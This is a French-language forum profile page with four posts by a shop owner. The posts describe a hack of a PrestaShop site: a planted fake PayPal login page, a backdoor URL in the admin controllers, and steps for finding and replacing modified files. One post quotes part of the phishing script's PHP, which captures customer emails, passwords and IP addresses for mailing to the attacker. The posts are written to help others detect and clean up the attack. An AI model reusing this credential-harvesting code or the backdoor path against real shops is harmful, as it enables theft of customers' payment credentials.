Jump to content

fressine

Members
  • Posts

    4
  • Joined

  • Last visited

Profile Information

  • Location
    France
  • Activity
    Freelancer

fressine's Achievements

Newbie

Newbie (1/14)

0

Reputation

  1. Personnellement, j'ai utilisé la fonction recherche de fichiers distants (F3) de Filezilla pour trouver tous les fichiers qui avaient été modifiés dans un interval de date donné.
  2. Dans mon cas, lorsque le client voulait payer par Paypal, il était dirigé vers l'url ../modules/home-cgi/loginPPL/login.php qui affichait un bel écran PayPal demandant le mail et le mot de passe du client (alors que client n'était même pas sur le site de Paypal).
  3. En plus le hacker avait installé un backdoor. Vérifier si l'url mondomaine.com/monadmin/ajax-tab.php?controller=AdminLogin&up=hous n'ouvre pas un backdoor pour télécharger un fichier sur le site. Moi c'était le cas. Pour corriger j'ai remplacé tous les fichiers de /controllers/admin/ par des fichiers sains pris sur un site prestashop de même version. A plus
  4. Bonjour à tous, J'ai eu la même attaque que vous à la même date. En plus de tous ces problèmes, vérifier si le hacker n'a pas créer des fichiers /modules/home-cgi et /modules/home-cpi dans /home-cgi/LoginPPL/login.php le pirate récupère les identifiants Paypal et les mots de passe des clients par PayPal. ession_start(); $mail=$_SESSION['mail'] = $_POST['mail']; $pass=$_SESSION['pass'] = $_POST['mdp']; $IP = $_SERVER['REMOTE_ADDR']; $to="[email protected]"; $to1="[email protected]"; $info=" |------- Rez by [ bajatax -- Sniper ] |------- |Email : $mail |password : $pass |IP : $IP Dans home-cpi, je pense qu'il récupère des n° de carte en cas de paiement par PayPal Bon courage à vous
×
×
  • Create New...